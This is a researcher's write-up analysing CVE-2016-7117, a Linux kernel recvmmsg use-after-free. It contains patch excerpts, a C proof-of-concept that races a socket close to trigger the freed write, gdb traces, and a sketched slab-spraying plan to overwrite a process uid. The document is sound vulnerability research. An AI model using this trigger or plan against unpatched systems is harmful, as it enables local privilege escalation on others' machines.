Notes about CVE-2016-7117
It's hard to find information about this, so I started looking deeper.
The Register has some cursory information:
The first of these (CVE-2016-7117) lies in the kernel networking subsystem allowing remote attackers to execute arbitrary code in the context of the kernel.
("Another critical hole (CVE-2016-0758 ) allows installed apps to execute arbitrary code within the context of the kernel via an elevation of privilege vulnerability in the kernel ASN.1 decoder." sounds fun too…)
The Debian and Ubuntu bug trackers both describe this as "use after
free in the recvmmsg exit path", which is a big hint. The Debian page
lists 4.5.2-1 as the "Fixed Version", which was released in
April. That page's changelog includes "net: Fix use after free in the
recvmmsg exit path". And so I found this email from March from Arnaldo
Carvalho de Melo, with a patch:
diff --git a/net/socket.c b/net/socket.c
index c044d1e8508c..db13ae893dce 100644
--- a/net/socket.c
+++ b/net/socket.c
@@ -2240,31 +2240,31 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
cond_resched();
}
-out_put:
- fput_light(sock->file, fput_needed);
-
if (err == 0)
- return datagrams;
+ goto out_put;
- if (datagrams != 0) {
+ if (datagrams == 0) {
+ datagrams = err;
+ goto out_put;
+ }
+
+ /*
+ * We may return less entries than requested (vlen) if the
+ * sock is non block and there aren't enough datagrams...
+ */
+ if (err != -EAGAIN) {
/*
- * We may return less entries than requested (vlen) if the
- * sock is non block and there aren't enough datagrams...
+ * ... or if recvmsg returns an error after we
+ * received some datagrams, where we record the
+ * error to return on the next call or if the
+ * app asks about it using getsockopt(SO_ERROR).
*/
- if (err != -EAGAIN) {
- /*
- * ... or if recvmsg returns an error after we
- * received some datagrams, where we record the
- * error to return on the next call or if the
- * app asks about it using getsockopt(SO_ERROR).
- */
- sock->sk->sk_err = -err;
- }
-
- return datagrams;
+ sock->sk->sk_err = -err;
}
+out_put:
+ fput_light(sock->file, fput_needed);
- return err;
+ return datagrams;
}
SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
--
2.5.0
This was merged and became 34b88a6 in the kernel repository.
This code is in __sys_recvmmsg; it looks roughly like this (before
the fix, at b6e4038, with irrelevant bits replaced with /* ... */):
int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
unsigned int flags, struct timespec *timeout)
{
int fput_needed, err, datagrams;
struct socket *sock;
struct mmsghdr __user *entry;
struct compat_mmsghdr __user *compat_entry;
struct msghdr msg_sys;
struct timespec end_time;
if (timeout &&
poll_select_set_timeout(&end_time, timeout->tv_sec,
timeout->tv_nsec))
return -EINVAL;
datagrams = 0;
sock = sockfd_lookup_light(fd, &err, &fput_needed);
if (!sock)
return err;
err = sock_error(sock->sk);
if (err)
goto out_put;
entry = mmsg;
compat_entry = (struct compat_mmsghdr __user *)mmsg;
while (datagrams < vlen) {
/* ... */
err = ___sys_recvmsg(sock,
(struct user_msghdr __user *)entry,
&msg_sys, flags & ~MSG_WAITFORONE,
datagrams);
if (err < 0)
break;
err = put_user(err, &entry->msg_len);
++entry;
}
if (err)
break;
++datagrams;
/* ... */
}
out_put:
fput_light(sock->file, fput_needed);
if (err == 0)
return datagrams;
if (datagrams != 0) {
/*
* We may return less entries than requested (vlen) if the
* sock is non block and there aren't enough datagrams...
*/
if (err != -EAGAIN) {
/*
* ... or if recvmsg returns an error after we
* received some datagrams, where we record the
* error to return on the next call or if the
* app asks about it using getsockopt(SO_ERROR).
*/
sock->sk->sk_err = -err;
}
return datagrams;
}
return err;
}
The old code calls sockfd_lookup_light, then calls fput_light before
it has finished using sock; the new code moves fput_light after the
last use of sock. The email includes:
And, as Dmitry rightly assessed, that is because we can drop the reference and then touch it when the underlying recvmsg calls return some packets and then hit an error, which will make recvmmsg to set sock->sk->sk_err, oops, fix it.
So, to demonstrate the use after free:
- recvmmsg calls sockfd_lookup_light, which probably increases the refcount.
- recvmmsg calls recvmsg.
- recvmsg returns a real packet. datagrams is incremented from 0.
- recvmmsg calls recvmsg.
- recvmsg returns an error other than -EAGAIN.
- recvmmsg breaks to the end of the while.
- fput_light is called, which decreases the refcount if it was increased above. Then the struct socket may be freed at any point.
- err != 0, so we don't return datagrams.
- datagrams != 0, and err != -EAGAIN, so we do sock->sk->sk_err = -err. This sock may have been freed after fput_light, so this is a use after free.
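The ordering problem in the steps above can be sketched in plain userspace C. This is only a toy model: struct toy_sock, toy_put, old_exit_path and new_exit_path are names I made up, nothing is really freed, and refs = 1 stands in for "another thread has already closed the fd, so ours is the last reference".

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Toy stand-in for the file/socket pair; NOT the kernel's types. */
struct toy_sock {
    int refs;      /* models the file reference count */
    bool released; /* set once the last reference is dropped */
    int sk_err;    /* models sock->sk->sk_err */
};

/* Models fput_light(): drop our reference; the object may now go away. */
void toy_put(struct toy_sock *s)
{
    assert(s->refs > 0);
    if (--s->refs == 0)
        s->released = true;
}

/* Pre-fix order: put first, then record the error.
 * Returns true if sk_err was written after the object was released. */
bool old_exit_path(struct toy_sock *s, int datagrams, int err)
{
    bool wrote_after_release = false;

    toy_put(s);
    if (err != 0 && datagrams != 0 && err != -EAGAIN) {
        wrote_after_release = s->released;
        s->sk_err = -err;
    }
    return wrote_after_release;
}

/* Post-fix order: record the error first, put last. */
bool new_exit_path(struct toy_sock *s, int datagrams, int err)
{
    bool wrote_after_release = false;

    if (err != 0 && datagrams != 0 && err != -EAGAIN) {
        wrote_after_release = s->released;
        s->sk_err = -err;
    }
    toy_put(s);
    return wrote_after_release;
}
```

With one datagram received and err = -EFAULT, old_exit_path reports a write after release and new_exit_path does not, which is the whole difference the patch makes.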
Questions:
- How do we make recvmsg error for the second packet?
- For a use-after-free, we need that to actually have been freed. How do we do that?
- Ultimately we want to get the allocation that takes the place where sock was, fill in the sk pointer, and get the kernel to write to a place we choose. Is that realistic?
I'm going to think about this first from the perspective of a local user, since remote exploitation seems much harder.
Making recvmsg err
So __sys_recvmmsg calls ___sys_recvmsg, which calls
copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov); and returns an
error if it does:
if (MSG_CMSG_COMPAT & flags)
err = get_compat_msghdr(msg_sys, msg_compat, &uaddr, &iov);
else
err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
if (err < 0)
return err;
This looks promising (in copy_msghdr_from_user):
if (!access_ok(VERIFY_READ, umsg, sizeof(*umsg)) ||
__get_user(uaddr, &umsg->msg_name) ||
__get_user(kmsg->msg_namelen, &umsg->msg_namelen) ||
__get_user(uiov, &umsg->msg_iov) ||
__get_user(nr_segs, &umsg->msg_iovlen) ||
__get_user(kmsg->msg_control, &umsg->msg_control) ||
__get_user(kmsg->msg_controllen, &umsg->msg_controllen) ||
__get_user(kmsg->msg_flags, &umsg->msg_flags))
return -EFAULT;
and the manpage says
ERRORS These are some standard errors generated by the socket layer. Additional errors may be generated and returned from the underlying protocol modules; see their manual pages.
… EFAULT The receive buffer pointer(s) point outside the process's address space.
So I think we can send two valid messages, and have the second
recvmmsg header point to a bad receive buffer.
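Here is a minimal sketch for checking the EFAULT idea on its own, with plain recvmsg and no race involved. The function name recvmsg_errno_for_bad_buffer is mine, and UINTPTR_MAX is just one convenient address that I'm assuming is never mapped in a userspace process.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/*
 * Queue one datagram on a socketpair, then try to receive it into an
 * address outside our address space. Returns the errno from recvmsg(),
 * 0 if recvmsg() unexpectedly succeeded, or -1 if setup failed.
 */
int recvmsg_errno_for_bad_buffer(void)
{
    int fds[2];
    int result = -1;

    if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, fds))
        return -1;

    if (send(fds[0], "hello!", 7, 0) == 7) {
        struct iovec iov = {
            .iov_base = (void *)UINTPTR_MAX, /* assumed unmapped */
            .iov_len = 1024,
        };
        struct msghdr hdr = { .msg_iov = &iov, .msg_iovlen = 1 };

        /* MSG_DONTWAIT so a surprise cannot leave us blocked. */
        if (recvmsg(fds[1], &hdr, MSG_DONTWAIT) < 0)
            result = errno;
        else
            result = 0;
    }

    close(fds[0]);
    close(fds[1]);
    return result;
}
```

If the reasoning above is right, this returns EFAULT (14), which is the error we want the second recvmmsg entry to hit.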
Closing the socket
This should be as easy as closing the socket in question in a thread
while another thread is in recvmmsg.
Trying it out
We'll try triggering the panic from userspace.
/* -*- compile-command: "gcc -Wall -Werror -pthread -static try_recvmmsg.c -o try_recvmmsg" -*- */
#define _GNU_SOURCE
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <pthread.h>

#define msg "hello!"

struct thread_config {
    int fds[2];
    char data[1024];
};

void *send_and_close_in_thread (void *arg)
{
    struct thread_config *config = arg;

    /* send the messages */
    for (size_t i = 0; i < 2; i++) {
        if (send(config->fds[0], msg, sizeof(msg), 0) != sizeof(msg)) {
            fprintf(stderr, "++ in send: %m\n");
            close(config->fds[0]);
            close(config->fds[1]);
            return NULL;
        }
    }

    /* wait for it to be received, then close things, so that the kernel doesn't EBADF */
    while (config->data[0] != msg[0]);;
    close(config->fds[0]);
    close(config->fds[1]);
    return NULL;
}

int main (int argc, char **argv)
{
    fprintf(stderr, "++ running!\n");

    struct thread_config config = {0};
    if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, config.fds)) {
        fprintf(stderr, "++ in socketpair: %m\n");
        return 1;
    }

    pthread_t thread = {0};
    if (pthread_create(&thread, NULL, send_and_close_in_thread, &config)) {
        fprintf(stderr, "++ in pthread_create: %m\n");
        close(config.fds[0]);
        close(config.fds[1]);
        return 1;
    }

    /* receive the first message fine.
       try to receive the second message to a buffer out of our address space,
       so that ___sys_recvmsg will return EFAULT. */
    recvmmsg(config.fds[1],
             (struct mmsghdr[2]) {
                 {
                     .msg_hdr = {
                         .msg_iov = & (struct iovec) {
                             .iov_base = &config.data,
                             .iov_len = sizeof(config.data)
                         },
                         .msg_iovlen = 1
                     }
                 },
                 {
                     .msg_hdr = {
                         .msg_iov = & (struct iovec) {
                             .iov_base = (void*) (~0),
                             .iov_len = 1024,
                         },
                         .msg_iovlen = 1
                     }
                 },
             },
             2,
             0,
             & (struct timespec) { .tv_sec = 1 });

    fprintf(stderr, "++ no panic? got %s.\n", config.data);
    return 1;
}
The timing is a little tricky: we have a thread send messages, wait
for the first one to be received, and then close the fds. If it closes
before the call to __sys_recvmmsg, __sys_recvmmsg will return
EBADF. If it closes after __sys_recvmmsg sets the error on the
struct sock, we won't get a use-after-free.
Then the main thread tries to recvmmsg two messages, with a bad
result buffer pointer on the second one. This way the second
___sys_recvmsg call errors, getting us on the code path described
above.
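The non-racy half of this can be checked without closing anything, so it is safe to run on a patched kernel too. The sketch below is single-threaded; recvmmsg_partial and struct partial_result are names I made up. From reading the exit path I'd expect recvmmsg to return 1 (one good datagram, then the error) and SO_ERROR to report EFAULT afterwards, but that is my reading of the code rather than something measured in these notes.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

struct partial_result {
    int received; /* return value of recvmmsg(), or -1 */
    int so_error; /* pending error read via SO_ERROR, or -1 */
};

/* Receive two queued datagrams; the second entry has a bad buffer. */
struct partial_result recvmmsg_partial(void)
{
    struct partial_result res = { .received = -1, .so_error = -1 };
    char good[64];
    struct iovec iov_good = { .iov_base = good, .iov_len = sizeof(good) };
    struct iovec iov_bad = { .iov_base = (void *)UINTPTR_MAX, .iov_len = 1024 };
    struct mmsghdr msgs[2] = {
        { .msg_hdr = { .msg_iov = &iov_good, .msg_iovlen = 1 } },
        { .msg_hdr = { .msg_iov = &iov_bad, .msg_iovlen = 1 } },
    };
    socklen_t len = sizeof(res.so_error);
    int fds[2];

    if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, fds))
        return res;

    if (send(fds[0], "hello!", 7, 0) == 7 &&
        send(fds[0], "hello!", 7, 0) == 7) {
        res.received = recvmmsg(fds[1], msgs, 2, MSG_DONTWAIT, NULL);
        /* The error from the second entry is parked in sk_err. */
        if (getsockopt(fds[1], SOL_SOCKET, SO_ERROR, &res.so_error, &len))
            res.so_error = -1;
    }

    close(fds[0]);
    close(fds[1]);
    return res;
}
```

The write that parks the error in sk_err is exactly the one that lands in freed memory when the other thread wins the race on an unpatched kernel.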
I checked this was the right code path like this (gdb connected
to qemu):
(gdb) b copy_msghdr_from_user
Breakpoint 21 at 0xffffffff82668db0: file net/socket.c, line 1823.
(gdb) c
Continuing.
[Switching to Thread 1]
Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0,
iov=0xffff88006b737a90) at net/socket.c:1823
1823 {
(gdb) finish
Run till exit from #0 copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0,
iov=0xffff88006b737a90) at net/socket.c:1823
0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737e18, msg=0x1ffff1000d6e6003, msg_sys=0xffff88006b737df8,
flags=225341379, nosec=<optimized out>) at net/socket.c:2091
2091 err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
Value returned is $59 = 0
(gdb) c
Continuing.
Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0,
iov=0xffff88006b737a90) at net/socket.c:1823
1823 {
(gdb) finish
Run till exit from #0 copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0,
iov=0xffff88006b737a90) at net/socket.c:1823
0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737b10, msg=0xffff88006b737b28, msg_sys=0xffff88006b737df8,
flags=225341266, nosec=<optimized out>) at net/socket.c:2091
2091 err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
Value returned is $60 = -14
(gdb) b socket.c:2265
Breakpoint 22 at 0xffffffff8266b892: file net/socket.c, line 2265.
(gdb) c
Continuing.
Thread 1 hit Breakpoint 22, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7ffc232faac0, vlen=<optimized out>, flags=0,
timeout=0xffff88006b737ee0) at net/socket.c:2265
2265 sock->sk->sk_err = -err;
(gdb)
After running it under gdb a lot in a VM built on b6e4038 (the commit
immediately before the fix), I got this (my notes in /* ... */ inline):
(gdb) b __sys_recvmmsg
Breakpoint 12 at 0xffffffff8266b440: file net/socket.c, line 2171.
(gdb) b socket.c:2265 /* sock->sk->sk_err = -err; */
Breakpoint 15 at 0xffffffff8266b892: file net/socket.c, line 2265.
(gdb) c
Continuing.
Thread 2 hit Breakpoint 12, __sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=2, flags=0, timeout=0xffff88006c4e7ee0)
at net/socket.c:2171
2171 {
/* temporary break at sockfd_lookup_light so we can 'finish' in it to see what it returns,
as a cute trick to get around "<optimized out>" */
(gdb) tbreak sockfd_lookup_light
Temporary breakpoint 20 at 0xffffffff82665940: file net/socket.c, line 450.
(gdb) c
Continuing.
Thread 2 hit Temporary breakpoint 20, sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8)
at net/socket.c:450
450 {
(gdb) finish
Run till exit from #0 sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8) at net/socket.c:450
__sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=<optimized out>, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2187
2187 if (!sock)
Value returned is $50 = (struct socket *) 0xffff88006bf61e00
(gdb) c
Continuing.
Thread 2 hit Breakpoint 15, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7fff9f3ccc80, vlen=<optimized out>, flags=0,
timeout=0xffff88006c4e7ee0) at net/socket.c:2265
2265 sock->sk->sk_err = -err;
/* !!! */
(gdb) p ((struct socket *)0xffff88006bf621c0)->file.f_count
Cannot access memory at address 0x38
/* ->file has been zeroed out, meaning this has been freed and used for something else */
(gdb) p ((struct socket *)0xffff88006bf621c0)->sk
$52 = (struct sock *) 0x0 <irq_stack_union>
(gdb) p &(((struct socket *)0xffff88006bf621c0)->sk->sk_err)
$53 = (int *) 0x1b0 <irq_stack_union+432>
(gdb)
So yes, we've got a use-after-free, and the kernel writes -err to
the address at 0x1b0.
Why does it only work sometimes? I think it's because the actual free
and using it again happens outside of the fput_light call tree, so
we're racing with another task or two in the kernel. But we can do it
repeatedly until it does work; it doesn't take long.
Reallocation
So we need to put some data where that struct socket used to be,
such that sk is a pointer to a piece of data whose offset
sk_err is where we would like to write.
struct socket is part of struct socket_alloc:
struct socket_alloc {
struct socket socket;
struct inode vfs_inode;
};
They're allocated in sock_alloc / sock_alloc_inode using the slab
allocator. This means that they're grabbed from "caches", which
are spread across multiple "slabs". Caches are homogeneous type-wise,
and e.g. each struct socket_alloc in a cache is pre-initialized.
Some resources about the slab allocator:
- "Slab Allocation" on Wikipedia
- "Anatomy of the Linux Slab Allocator" on IBM developerworks (apparently no longer available, so this is a link to an archive).
I can think of a situation where we can use the slab allocator to get what we want to happen:
- The slabs that are part of the struct socket_alloc cache (sock_inode_cache) fill up.
- We create a socketpair for our use-after-free that occupies the first and second slot in a new slab.
- We close both elements of our socketpair. This causes the slab to be freed. We then immediately add some items (more than a slabfull) to another cache, with the pointer we want to write to at offset sk in each item.
- This causes a new slab to be allocated for the second cache, which ideally will be exactly where our first cache used to be. So, the struct socket pointer in __sys_recvmmsg now points to an item we control in a new slab.
- The kernel code runs and sets the offset sk_err from our pointer to -err.
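The core idea in the steps above, that a stale pointer ends up looking at whatever gets allocated into the same memory next, can be shown with a toy fixed-size pool. This is a sketch only: toy_pool and its functions are made up, the pool hands a freed slot straight back to the next caller, and the real slab allocator (especially reuse across different caches) is far less predictable.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define SLOT_SIZE 64
#define SLOT_COUNT 4

/* A toy fixed-size pool with a LIFO free list; NOT the kernel allocator. */
struct toy_pool {
    unsigned char slots[SLOT_COUNT][SLOT_SIZE];
    int free_stack[SLOT_COUNT]; /* indices of free slots */
    int free_top;               /* number of entries in free_stack */
};

void toy_pool_init(struct toy_pool *p)
{
    memset(p->slots, 0, sizeof(p->slots));
    /* Push in reverse so slot 0 is handed out first. */
    for (int i = 0; i < SLOT_COUNT; i++)
        p->free_stack[i] = SLOT_COUNT - 1 - i;
    p->free_top = SLOT_COUNT;
}

void *toy_alloc(struct toy_pool *p)
{
    if (p->free_top == 0)
        return NULL;
    return p->slots[p->free_stack[--p->free_top]];
}

void toy_free(struct toy_pool *p, void *obj)
{
    ptrdiff_t idx = ((unsigned char *)obj - &p->slots[0][0]) / SLOT_SIZE;

    assert(idx >= 0 && idx < SLOT_COUNT && p->free_top < SLOT_COUNT);
    p->free_stack[p->free_top++] = (int)idx;
}

/* Returns 1 if a pointer kept past the free aliases the next allocation. */
int stale_pointer_sees_new_data(void)
{
    struct toy_pool pool;
    toy_pool_init(&pool);

    unsigned char *victim = toy_alloc(&pool);   /* plays "struct socket" */
    unsigned char *stale = victim;              /* kept past the free */
    toy_free(&pool, victim);

    unsigned char *attacker = toy_alloc(&pool); /* reuses the same slot */
    memset(attacker, 0x41, SLOT_SIZE);

    return attacker == stale && stale[0] == 0x41;
}
```

Everything here lives in one array, so no memory is actually misused; it only shows why controlling the next allocation means controlling what the stale sock pointer reads.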
Some things that make it easier:
- We can just repeatedly try it until it works, allocating an extra socket each time so that we progress through the slab.
- /proc/slabinfo says that the sock_inode_cache slab has 12 objects per slab (in my vm; it seems to vary). This is an upper bound on the number of sockets we'll need to open to get an object at the beginning of the slab, assuming no other process is creating sockets.
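Pulling the object size and objects-per-slab numbers out of a /proc/slabinfo line can be sketched like this. It assumes the version 2.1 column order (name, active_objs, num_objs, objsize, objperslab, pagesperslab); parse_slabinfo_line and struct slab_line are names I made up, and reading the real file usually needs root.

```c
#include <assert.h>
#include <stdio.h>

struct slab_line {
    char name[64];
    unsigned long active_objs;
    unsigned long num_objs;
    unsigned long objsize;      /* bytes per object */
    unsigned long objperslab;   /* objects in one slab */
    unsigned long pagesperslab;
};

/* Parse one data line of /proc/slabinfo. Returns 0 on success, -1 otherwise. */
int parse_slabinfo_line(const char *line, struct slab_line *out)
{
    int n = sscanf(line, "%63s %lu %lu %lu %lu %lu",
                   out->name, &out->active_objs, &out->num_objs,
                   &out->objsize, &out->objperslab, &out->pagesperslab);

    return n == 6 ? 0 : -1;
}
```

For example, feeding it "sock_inode_cache 1234 1248 640 12 2 : tunables 0 0 0 : slabdata 104 104 0" gives objsize 640 and objperslab 12. Only the 640 and the 12 come from my VM; the other numbers in that line are invented for illustration.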
That sounds totally possible!
What are we getting the kernel to write? err is -14 in our case, so
the kernel is writing 14 for us. If we control the pointer, though, we
can line it up only partially with a field we want to overwrite,
writing any portion of {0x0e, 0x00, 0x00, 0x00} (sk_err is an int, so
the store is four bytes wide) anywhere we choose. Some ideas:
- Overwrite the uid of our process (and write 0xe to the byte before it), so that it has uid 0.
- Overwrite a return address on the stack so that the kernel returns to code we choose. (This will be tricky with KASLR).
- Overwrite a boolean on the stack to either 0 or 0xe (truthy) to get around some permission check.
However, I'm not actually sure how aggressively slabs get reused by different caches, and I'm not sure of an easy way to find out. But! We can probably use a lot of memory to make that happen, or try freeing a couple dozen slabs at the same time.
Which cache do we try to write to?
/proc/slabinfo says the sock_inode_cache has objects of
size 640. This is kind of an inconvenient number: the only other
objects with that size are also inode caches, and they don't have any
user-controllable data at the offset of sk_err.
But the kmalloc cache kmalloc-1024 has 1024-byte items, and 16 of
them fit in a slab. If we can find a path in the
kernel that copies data we control into a kmalloc bigger than 460 +
sk_err + sizeof(void *) = 896, we can get the kernel to set an int
at an address we choose to 14.
But there are a lot of calls to kmalloc in the kernel, and finding a
good one will take time. So I'm publishing this now; I'll write
more when I find one.
How much trouble are we in?
I think this exploit will work, so we have a pretty bad local privilege escalation bug. I was able to trigger the use-after-free in less than an hour of work after reading the description of the bug, and I'm not even a kernel hacker. Given more time I'm pretty sure I could make it repeatably write to a location of our choice.
I think this would be difficult to exploit remotely, for the following reasons:
- recvmmsg is much less common than recvmsg, in the wild. GitHub search shows about 800k uses of recvmmsg vs about 3.6 million for recvmsg. recvmsg isn't all that common anyway; recv has about 29 million uses on GitHub.
- A remote attacker would need to cause the recvmsg to err and cause the socket to close while in the recvmmsg call. Looking casually, I didn't see a great way to cause recvmmsg to err from the sending side. recvmsg and recvmmsg are normally used for connectionless protocols, anyway, so I wouldn't expect it to be easy to cause a service to close its socket.
But I'd love to be proven wrong.